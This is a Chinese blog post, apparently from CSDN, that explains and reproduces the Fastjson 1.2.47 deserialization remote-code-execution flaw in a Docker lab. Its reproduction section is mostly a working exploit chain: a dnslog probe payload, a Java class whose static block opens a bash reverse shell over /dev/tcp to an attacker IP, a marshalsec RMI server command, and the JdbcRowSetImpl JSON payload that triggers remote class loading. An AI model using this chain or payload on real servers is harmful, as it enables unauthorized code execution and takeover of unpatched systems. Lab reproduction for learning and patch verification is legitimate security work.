FastJson反序列化漏洞(Fastjson1.2.47)

最新推荐文章于 2024-03-28 18:31:16 发布
最新推荐文章于 2024-03-28 18:31:16 发布
阅读量658 收藏 13
点赞数 23
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jxy158212/article/details/136257953
版权

一、FastJson

Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 库。可以将Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)

它采用一种“假定有序快速匹配”的算法,把 JSON Parse 的性能提升到极致,是目前 Java 语言中最快的 JSON 库,并且它不依赖于其它任何库。Fastjson已经被广泛使用在缓存序列化、协议交互、Web输出、Android客户端等多种应用场景。

二、json

json全称是JavaScript object notation。即JavaScript对象标记法,使用键值对进行信息的存储。json本质就是一种字符串,用于信息的存储和交换

JSON有两种表示结构,对象和数组。 对象结构以”{”大括号开始,以”}”大括号结束。中间部分由0或多个以”,”分隔的”key(关键字)/value(值)”对构成,关键字和值之间以”:”分隔

{
    "name":"hahaha",
    "age":23,
    "sex":"F"
}

三、判断是否使用FastJson

抓包后看请求包中从传入的参数值是否形如json格式。随后将json数据随意修改,看相应包中是否出现fastjson.JSONException字样

正常请求是get请求,没有请求体。构造错误的POST请求,看响应包是否含有fastjson字样

四、漏洞原理

1、原理

使用AutoType功能进行序列化的JSON字符会带有一个@type来标记其字符的原始类型,在反序列化的时候会读取这个@type,来试图把JSON内容反序列化到对象,并且会调用这个库的setter或者getter方法,然而,@type的类有可能被恶意构造,只需要合理构造一个JSON,使用@type指定一个想要的攻击类库就可以实现攻击。

fastJSON在反序列化时,可能会将目标类的构造函数、getter方法、setter方法、is方法执行一遍,如果此时这四个方法中有危险操作,则会导致反序列化漏洞,也就是说攻击者传入的序列化数据中需要目标类的这些方法中要存在漏洞才能触发。

攻击者准备rmi服务和web服务,将rmi绝对路径注入到lookup方法中,受害者JNDI接口会指向攻击者控制rmi服务器,JNDI接口向攻击者控制web服务器远程加载恶意代码,执行构造函数形RCE。

常见的有sun官方提供的一个类com.sun.rowset.JdbcRowSetImpl,其中有个dataSourceName方法支持传入一个rmi的源,只要解析其中的url就会支持远程调用!

2、漏洞复现的原理过程

①攻击者(我们)访问存在fastjson漏洞的目标靶机网站,通过burpsuite抓包改包,以json格式添
加com.sun.rowset.JdbcRowSetImpl恶意类信息发送给目标机。

②存在漏洞的靶机对json反序列化时候,会加载执行我们构造的恶意信息(访问rmi服务器),靶机服
务器就会向rmi服务器请求待执行的命令。也就是靶机服务器问rmi服务器,(靶机服务器)需要执
行什么命令啊?

③rmi 服务器请求加载远程机器的class(这个远程机器是我们搭建好的恶意站点,提前将漏洞利
用的代码编译得到.class文件,并上传至恶意站点),得到攻击者(我们)构造好的命令(ping
dnslog或者创建文件或者反弹shell啥的)

④rmi将远程加载得到的class(恶意代码),作为响应返回给靶机服务器。

⑤靶机服务器执行了恶意代码,被攻击者成功利用。

五、漏洞复现

1、靶场搭建

docker-compose up -d

cat docker-compose.yml

2、漏洞发现(利用 dnslog)

{"a":{"@type":"java.net.Inet4Address","val":"00bkvf.dnslog.cn"}}

将content-type的值改为application/json,并将payload添加到后面

3、漏洞利用

①制作反弹Payload

编译恶意代码,通过javac TouchFile.java 编译成class文件,将编译好的class上传至你的web服务器

import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.111.129/1234 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
javac TouchFile.java

②开启HTTP服务

python3 -m http.server 8000

此步是为了接收rmi服务重定向请求,需要在payload的目录下开启此web服务,这样才可以访问到payload文件

③服务器使用marshalsec开启rmi服务监听

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.111.129:8000/#TouchFile" 999

使用marshalsec工具快捷的开启rmi服务,借助LDAP服务将LDAP reference result 重定向到web服务器

④nc监听

⑤执行Payload

将请求改为post

修改Content-Type的值:Content-Type: application/json

添加payload

{
    "name":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "x":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.111.129:999/Exploit",
        "autoCommit":true
    }
 
}

哈哈。。。。。。
关注
  • 23
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
springmvc fastjson 序列时间格式方法(推荐)
10-20
下面小编就为大家带来一篇springmvc fastjson 序列时间格式方法(推荐)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Fastjson序列漏洞史1
08-03
Fastjson 序列漏洞史2020年05月08日漏洞分析 (/category/vul-analysis/) · 404专栏 (/category/404
Java安全篇-Fastjson漏洞
最新发布
m0_63138919的博客
03-28 1904
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
Fastjson各版本序列EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
![img](https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Fastjson/Fastjson%E5%90%84%E7%89%88%E6%9C%AC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB/PIC/index.png) # Fastjson<=1.2.47序列漏洞为例 1、此时/tmp目录 ![img](https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Fastjson/Fastjson%E5%90%84%E7%89%88%E6%9C%AC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB/PIC/tmp.png) 2、编译Exploit.java javac
fastjson1.2.47远程代码漏洞解决方案.rar
07-12
fastjson版本低于1.2.47出现的远程代码漏洞解决方案。
fastjson漏洞 - Fastjson1.2.47序列漏洞
HAKUNAMATATATTA的博客
01-06 2366
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串,Bean 序列为 JSON 字符串,也可以从 JSON 字符串序列到 Java Bean。
Fastjson漏洞原理分析
LTianHang的博客
06-04 4715
fastjson中产生漏洞的根本原因在于其autoType机制,以及针对于autoType机制做的checkAutoType检测防御机制。
Fastjson漏洞
qq_50854662的博客
10-09 4991
Fastjson漏洞
Fastjson系列漏洞实战和总结
qq_50854662的博客
10-09 2886
Fastjson系列漏洞实战和总结
fastjson序列漏洞fastjson-1.2.47)
zyer
04-28 3982
fastjson 1.2.47 爆出了最为严重的漏洞,可以在不开启 AutoTypeSupport 的情况下进行序列的利用。 一.原理 测试代码Test.java import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONObject; public class Test { public static void main(String[] args) { String s2 =...
Fastjson序列漏洞
热门推荐
LJH1999ZN的博客
03-31 3万+
一、fastjson简介 fastjson是java的一个库,可以将java对象转为json格式的字符串,也可以将json格式的字符串转为java对象 提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符串,parseObject 方法则过来将 JSON 字符串转换成对象。 二、fastjson序列漏洞原理 在序列的时候,会进入parseField方法,进
fastjson序列漏洞(1.2.47-rce)
siu~
10-18 441
FastJson在解析json的过程中,支持使用autoType来实例某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增
fastjson 1.2.47 RCE漏洞保姆级复现
ALLEN'Blog
02-01 1271
Fastjson提供了autotype功能,允许用户在序列数据中通过“@type”指定序列的类型,Fastjson自定义的序列机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且序列不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson
fastjson 1.2.47 远程命令执行漏洞
weixin_42786460的博客
10-14 467
fastjson 1.2.47 远程命令执行漏洞
fastjson1.2.47漏洞复现
m0_63699746的博客
07-05 693
​在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上可以说是标准的数据交换格式。相比1.2.24,1.2.47过滤了许多恶意类的上传姿势以及关闭了autoType,例如双写等绕过,但是并不阻挡hacker的攻击脚步,发现在fastjson中有一个全局缓存,当有类进行加载时,如果autoType没开启,会尝试从缓存中获取类,如果缓存中有,则直接返回。浏览器输入ip:端口。
渗透测试 | FastJson漏洞原理与复现
m0_60571990的博客
03-09 1376
渗透测试 | FastJson漏洞原理与复现
vulhub复现之fastjson1.2.47漏洞复现
m0_70483044的博客
07-14 2838
目录什么是json?fastjson有啥用?什么是fastjson?json语法规则为什么要引进AutoType?漏洞原理怎么确认存在漏洞的?漏洞复现弹shell。
fastjson 序列漏洞
08-24
fastjson 序列漏洞是指在使用 fastjson 库解析 JSON 字符串时存在安全风险的问题。具体来说,fastjson 序列漏洞是由于 fastjson 在处理特定的恶意构造的 JSON 字符串时,可能会触发不安全的序列操作,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值